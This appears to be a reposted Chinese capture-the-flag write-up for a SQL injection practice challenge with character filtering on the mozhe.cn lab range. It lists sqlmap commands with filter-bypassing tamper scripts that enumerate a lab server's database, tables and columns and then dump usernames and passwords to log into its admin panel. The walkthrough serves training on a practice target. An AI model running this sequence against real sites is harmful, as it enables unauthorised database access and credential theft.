SQL过滤字符后手工注入漏洞测试(第1题) - 走看看

zoukankan html css js c++ java

SQL过滤字符后手工注入漏洞测试(第1题)

https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe

分析题目，属于时间盲注，这种情况，通常使用sqlmap 直接注入就行了，手动语法太复杂了！！！

sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment --current-db

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup --tables

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member --columns

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password,status --dump

登录后台，获取flag，提交即可

查看全文

相关阅读:
Code::blocks 使用c++ long double类型出错
 数论四大定理
 线性基
 win7 下强制删除文件
 C++数组指针的引用
 学习方法
 MySQL的ON DUPLICATE KEY UPDATE用法
 MVCC
RabbitMQ中的Connection 和 Channel
myisam和innodb的比较

原文地址：https://www.cnblogs.com/hack404/p/10755300.html

Copyright © 2011-2022 走看看